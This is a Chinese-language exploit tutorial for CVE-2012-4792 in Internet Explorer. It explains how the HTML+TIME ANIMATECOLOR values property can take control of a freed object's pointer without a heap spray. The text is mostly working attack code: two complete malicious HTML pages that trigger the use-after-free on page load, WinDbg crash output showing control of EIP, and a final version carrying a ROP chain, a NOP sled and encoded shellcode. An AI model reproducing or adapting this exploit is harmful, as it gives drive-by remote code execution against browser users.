前面的一篇用HeapSpary完成了在win7下繞過DEP及ASLR的利用,這次同樣一CVE-2012-4792做爲例子,前面讀國外一篇文章:
http://blog.exodusintel.com/2013/01/02/happy-new-year-analysis-of-cve-2012-4792/
文章提到用一種叫“HTML+TIME”的東西,通過該方法可以實現不需要Heap Spary就能完成exploit,具體說明如下:
關於HTML+TIME的說明可以參考微軟的知識庫:
引用HTML+TIME的代碼如下:
<HTML XMLNS:t ="urn:schemas-microsoft-com:time"> <head> <meta> <?IMPORT namespace="t" implementation="#default#time2"> </meta> . . . <t:ANIMATECOLOR id="myanim"/>
接下來只需要構造ANIMATECOLOR的value屬性,該屬性可參考上面的最後一個知識庫鏈接,構造如下:
animvalues = "\u4141\u4141" while(animvalues.length < 0xDC) { animvalues += animvalues } for(i = 0; i < 21; i++) { animvalues += ";cyan"; }
最終產生的字符串如下形式:
“\u4141\u4141....;cyan;cyan;cyan;cyan;”
每個分號作爲分隔符,這樣一共22組,接下來將這個字符串通過以下方式賦值給ANIMATECOLOR的value屬性:
try {
a = document.getElementById('myanim');
a.values = animvalues;
}
catch(e) {}
由於ANIMATECOLOR的特性,a.values會根據字符串的格式來申請堆空間,申請的空間大小取決於字符串被分號分割的項數,分配後的堆空間將用每一個項(分號分割的項)的地址來進行初始化,這裏將會申請22*4個字節的堆空間,即0x58大小,每個DWORD保存每一項的地址,因此我們就控制了內存中一個指針,並能夠控制該指針指向的數據,接下來就可以進行exploit了:
<!doctype html> <HTML XMLNS:t ="urn:schemas-microsoft-com:time"> <head> <meta> <?IMPORT namespace="t" implementation="#default#time2"> </meta> <script> function helloWorld() { var e0 = null; var e1 = null; var e2 = null; animvalues = "\u4141\u4141" while(animvalues.length < 0xDC) { animvalues += animvalues } for(i = 0; i < 21; i++) { animvalues += ";cyan"; } try { e0 = document.getElementById("a"); e1 = document.getElementById("b"); e2 = document.createElement("q"); e1.applyElement(e2); e1.appendChild(document.createElement('button')); e1.applyElement(e0); e2.outerText = ""; e2.appendChild(document.createElement('body')); } catch(e) { } CollectGarbage(); try { a = document.getElementById('myanim'); a.values = animvalues; } catch(e) {} } </script> </head> <body onload="eval(helloWorld())"> <t:ANIMATECOLOR id="myanim"/> <form id="a"> </form> <dfn id="b"> </dfn> </body> </html>
windbg掛載後的奔潰信息如下:
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00199c60 ebx=0021d0a8 ecx=00000052 edx=00000000 esi=00000000 edi=00216468
eip=41414141 esp=020df830 ebp=020df8a4 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
41414141 ?? ???
0:008> dd edi
00216468 00199c60 02e1ebc0 0023f5c0 0023f5d8
00216478 0023f578 0016bda0 0016bbd8 00187da0
00216488 0333bce0 0333bcf8 0333bd10 0333bd28
00216498 0333bd40 0333bd58 0333bd70 0333bd88
002164a8 0333bda0 0333bdb8 0333bdd0 0333bde8
002164b8 0333be00 0333be18 eaa84100 ff080000
002164c8 000000fe 00000000 00000000 00000000
002164d8 00000000 00000000 00000000 00000000
0:008> dc poi(edi)
00199c60 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
00199c70 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
00199c80 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
00199c90 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
00199ca0 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
00199cb0 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
00199cc0 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
00199cd0 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
0:008> dc poi(edi+4)
02e1ebc0 00790063 006e0061 02e80000 00000000 c.y.a.n.........
02e1ebd0 eaf06f92 ff080167 02e235dc 001f9038 .o..g....5..8...
02e1ebe0 02e8e12c 00000000 eaf06f95 ff0c0100 ,........o......
02e1ebf0 6359d910 00000001 001f9028 00000000 ..Yc....(.......
02e1ec00 eaf06f68 ff0c010a 00000000 00000000 ho..............
02e1ec10 00000001 00000000 eaf06f6b ff080100 ........ko......
02e1ec20 0021cfd0 001f9038 02e1eb78 00000000 ..!.8...x.......
02e1ec30 00000000 00000000 00000000 00000000 ................
0:008> dc poi(edi+8)
0023f5c0 00790063 006e0061 00200000 00000000 c.y.a.n... .....
0023f5d0 eaabd9a2 ff0e0100 00790063 006e0061 ........c.y.a.n.
0023f5e0 00200000 00000000 eaabd9a5 ff080100 .. .............
0023f5f0 00148098 00000001 1690030b 01700d8c ..............p.
0023f600 eaabd9d8 ff080100 0063006e 006c0061 ........n.c.a.l.
0023f610 00700072 00000063 eaabd9db ff0c0100 r.p.c...........
0023f620 00000002 50000001 50000007 02db1318 .......P...P....
0023f630 eaabd9de ff0a0100 0074006e 00760073 ........n.t.s.v.
可以看到edi指向一塊大小爲0x58的堆空間,指向前面分配的字符串。這樣我們就可以控制一個指針以及指針中的數據了,用前一篇文章用的ROP鏈,
<!doctype html> <HTML XMLNS:t ="urn:schemas-microsoft-com:time"> <head> <meta> <?IMPORT namespace="t" implementation="#default#time2"> </meta> <script> location.href = 'ms-help://' function helloWorld() { var e0 = null; var e1 = null; var e2 = null; animvalues = "\u34b4\u51bf\u10b8\u51bd\u2d97\u51bd\ucba0\u51bd"+ "\u79e2\u51c3\u9683\u51c5\u6fbd\u51c5\ufffe\ua17f"+ "\u1e01\u51c1\u92d8\u51c3\ue67d\u51bf\u6fbd\u51c5"+ "\ufc3d\ua17f\u1e01\u51c1\u592b\u51bf\ucf3e\u51be"+ "\ud150\u51c5\uf563\u51be\u7402\u51c0\u6fbd\u51c5"+ "\u9090\u9090\ua8dc\u51bd"+ //ROP End "\u9090\u9090\u9090\u9090"+ "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090"+ "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090"+ "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090"+ "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090"+ "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090"+ "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090"+ "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090"+ "\u9090\u9090\u9090\u9090\u9090\u9090\u4a41\u51be"+ "\u9090\u9090"+ "\uc481\uf254\uffff\u2ebf\ue4ed\udbc0\ud9c8\u2474" + "\u58f4\uc933\u33b1\u7831\u0312\u1278\uee83\u06e9" + "\u1235\u4f19\ueab6\u30da\u0f3e\u62eb\u4424\ub35e" + "\u082e\u3853\ub862\u4ce0\ucfab\ufa41\ufe8d\uca52" + "\uac11\u4c91\uaeee\uaec5\u61cf\uae18\u9f08\ue2d3" + "\ud4c1\u1346\ua865\u125a\ua7a9\u6ce3\u77cc\uc697" + "\ua7cf\u5c08\u5f87\u3a22\u5e38\u58e7\u2904\uab8c" + "\ua8fe\ue244\u9bff\ua9a8\u14c1\ub325\u9206\uc6d6" + "\ue17c\ud16b\u9846\u54b7\u3a5b\uce33\ubbbf\u8990" + "\ub734\udd5d\udb13\u3260\ue728\ub5e9\u6eff\u91a9" + "\u2bdb\ubb69\u917a\uc4dc\u7d9d\u6080\u6fd5\u13d5" + "\ue5b4\u9128\u40c2\ua92a\ue2cc\u9843\u6d47\u2513" + "\uca82\u6feb\u7a8f\u3664\u3f45\uc9e9\u03b3\u4a14" + "\ufb36\u52e3\ufe33\ud4a8\u72af\ub0a0\u21cf\u90c1" + "\ua4b3\u7851\u431a\u1bd2\u4162"; for(i = 0; i < 21; i++) { animvalues += ";cyan"; } try { e0 = document.getElementById("a"); e1 = document.getElementById("b"); e2 = document.createElement("q"); e1.applyElement(e2); e1.appendChild(document.createElement('button')); e1.applyElement(e0); e2.outerText = ""; e2.appendChild(document.createElement('body')); } catch(e) { } CollectGarbage(); try { a = document.getElementById('myanim'); a.values = animvalues; } catch(e) {} } </script> </head> <body onload="eval(helloWorld())"> <t:ANIMATECOLOR id="myanim"/> <form id="a"> </form> <dfn id="b"> </dfn> </body> </html>
這樣就可以不通過HeapSpary完成漏洞的利用。